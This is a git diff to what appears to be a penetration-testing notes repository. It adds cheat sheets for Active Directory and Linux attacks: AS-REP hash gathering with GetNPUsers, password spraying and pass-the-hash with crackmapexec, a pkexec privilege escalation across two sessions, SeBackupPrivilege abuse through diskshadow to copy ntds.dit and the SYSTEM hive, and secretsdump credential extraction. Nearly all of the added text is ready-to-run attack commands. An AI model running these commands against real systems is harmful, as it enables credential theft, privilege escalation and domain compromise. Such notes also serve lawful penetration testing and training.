diff --git a/.gitmodules b/.gitmodules index 6abf8eb..8f50a98 100644 --- a/.gitmodules +++ b/.gitmodules @@ -100,3 +100,6 @@ [submodule "reverse_engineering/java/deobfuscator"] path = reverse_engineering/java/deobfuscator url = https://github.com/java-deobfuscator/deobfuscator.git +[submodule "exploit/windows/CrackMapExec"] + path = exploit/windows/CrackMapExec + url = https://github.com/byt3bl33d3r/CrackMapExec.git diff --git a/enumeration/docs/kerberoast.md b/enumeration/docs/kerberoast.md new file mode 100644 index 0000000..bef379b --- /dev/null +++ b/enumeration/docs/kerberoast.md @@ -0,0 +1,20 @@ +# Kerberoast + +## Usage + +* Impacket's `GetNPUsers.py` to get Hashes of userlist +```sh +GetNPUsers.py -no-pass / -usersfile users.txt -format john -outputfile hashes +``` + +* Use crackmapexec to gain access to further user accounts with the password of the user found with `GetNPUsers.py` +```sh +crackmapexec smb $TARGET_IP -u users.txt -p pass.txt +``` + * Watch out for `STATUS_PASSWORD_MUST_CHANGE` + * Change password with +```sh +smbpasswd.py @$TARGET_IP -newpass password123 +``` + + diff --git a/enumeration/docs/rsync.md b/enumeration/docs/rsync.md index a3d72fa..f7fd55a 100644 --- a/enumeration/docs/rsync.md +++ b/enumeration/docs/rsync.md @@ -1,6 +1,7 @@ # rsync -[netspi article]( https://www.netspi.com/blog/technical/network-penetration-testing/linux-hacking-case-studies-part-1-rsync/) +* [netspi article]( https://www.netspi.com/blog/technical/network-penetration-testing/linux-hacking-case-studies-part-1-rsync/) +* [hacktricks' rsync](https://book.hacktricks.xyz/pentesting/873-pentesting-rsync) ## Enumerate @@ -9,6 +10,19 @@ rsync :: rsync ::files rsync ::files/foo/ ``` +### via netcat +* Another way is the following +```sh +nc -vn $TARGET_IP 873 +``` +* Repeat the identical handshake, e.g. +``` +@RSYNCD: 31.0 +``` +* List all directories +```sh +#list +``` ## Downloads diff --git a/exploit/linux/polkit.md b/exploit/linux/polkit.md index 7dcdba8..eca25ba 100644 --- a/exploit/linux/polkit.md +++ b/exploit/linux/polkit.md @@ -22,3 +22,19 @@ dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-re * `su user1` and `sudo -s` +# Priv Esc with Two Sessions +* User has to be member of group `sudo` +* Open two ssh sessions +* In session one check the PID +```sh +echo $$ +``` +* In the other session +```sh +pkttyagent --process +``` +* In session one do +```sh +pkexec "/bin/bash" +``` +* Enter password in session two diff --git a/exploit/web/ssti/tplmap b/exploit/web/ssti/tplmap index 1d63156..6f21501 160000 --- a/exploit/web/ssti/tplmap +++ b/exploit/web/ssti/tplmap @@ -1 +1 @@ -Subproject commit 1d6315650b2177d25e5f8513b35dd80006996d98 +Subproject commit 6f2150134dc637ff80478f623f28bb548ea2ca15 diff --git a/exploit/windows/CrackMapExec b/exploit/windows/CrackMapExec new file mode 160000 index 0000000..a8df4c2 --- /dev/null +++ b/exploit/windows/CrackMapExec @@ -0,0 +1 @@ +Subproject commit a8df4c2a868378576f3b959261ad756e06ed3749 diff --git a/exploit/windows/docs/impacket.md b/exploit/windows/docs/impacket.md index c51d8d2..b8c7297 100644 --- a/exploit/windows/docs/impacket.md +++ b/exploit/windows/docs/impacket.md @@ -2,3 +2,13 @@ * [Repo](https://github.com/SecureAuthCorp/impacket) +## Secretsdump +* `ntds.dit` and `system.hive` are needed +```sh +secretsdump.py -system system.hive -ntds ntds.dit -hashes lmhash:nthash LOCAL -outputfile hashes.txt +```` +* Remove everything but the hashes +* Use it to log in on the target +```sh +crackmapexec smb $TARGET_IP -u -H hashes.txt +``` diff --git a/exploit/windows/impacket b/exploit/windows/impacket index 6da655c..10e5395 160000 --- a/exploit/windows/impacket +++ b/exploit/windows/impacket @@ -1 +1 @@ -Subproject commit 6da655ca9ac4f9c2a207ea47e79d089044accd78 +Subproject commit 10e53952e64e290712d49e263420b70b681bbc73 diff --git a/hydra.md b/hashes/password_cracking/hydra.md similarity index 100% rename from hydra.md rename to hashes/password_cracking/hydra.md diff --git a/post_exploitation/docs/windows/pass_the_hash.md b/post_exploitation/docs/windows/pass_the_hash.md new file mode 100644 index 0000000..682d941 --- /dev/null +++ b/post_exploitation/docs/windows/pass_the_hash.md @@ -0,0 +1,12 @@ +# Pass the Hash + +## Usage + +```sh +GetUserSPNs.py / -hashes -outputfile hash.txt +``` +* Crack the password +* login +```sh +evilwinrm -i $TARGET_IP -u -p password +``` diff --git a/post_exploitation/docs/windows/sebackupprivilege.md b/post_exploitation/docs/windows/sebackupprivilege.md new file mode 100644 index 0000000..b8f6537 --- /dev/null +++ b/post_exploitation/docs/windows/sebackupprivilege.md @@ -0,0 +1,29 @@ +# SEBackupPrivilege Escalation + +* Check user privileges to escalate + +## Usage +* Check `whoami /all` +* `SeBackupPrivilege` must be present +* [Payloads all the things](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#using-diskshadow-a-windows-signed-binary) +* Upload `diskshadow.txt` to the target with the following content +```sh +set metadata C:\tmp\tmp.cabs +set context persistent nowriters +add volume c: alias someAlias +create +expose %someAlias% h: +``` +* Change dir to `C:\Windows\System32` and `diskshadow.exe /s C:\Path\to\diskshadow.txt` +* Upload these [dlls](https://github.com/giuliano108/SeBackupPrivilege) to the target +```sh +import-module .\SeBackupPrivilegeUtils.dll +import-module .\SeBackupPrivilegeCmdLets.dll +copy-filesebackupprivilege h:\windows\ntds\ntds.dit C:\tmp\ntds.dit -overwrite +reg save HKLM\SYSTEM C:\Path\to\uploads\system +``` +* Downloads the files `ntds.dit` and `system` +* Extract the hashes via +```sh +secretsdump.py -system system -ntds ntds.dit LOCAL > out.txt +``` diff --git a/post_exploitation/priv_esc/privesc-scripts/privilege-escalation-awesome-scripts-suite b/post_exploitation/priv_esc/privesc-scripts/privilege-escalation-awesome-scripts-suite index a17f917..8c67152 160000 --- a/post_exploitation/priv_esc/privesc-scripts/privilege-escalation-awesome-scripts-suite +++ b/post_exploitation/priv_esc/privesc-scripts/privilege-escalation-awesome-scripts-suite @@ -1 +1 @@ -Subproject commit a17f91745cafc5fa43a428d766294190c0ff70a1 +Subproject commit 8c67152e1761fb9b403918a7fa174126f36f61db diff --git a/xor_key_file.py b/stego/xor_key_file.py similarity index 100% rename from xor_key_file.py rename to stego/xor_key_file.py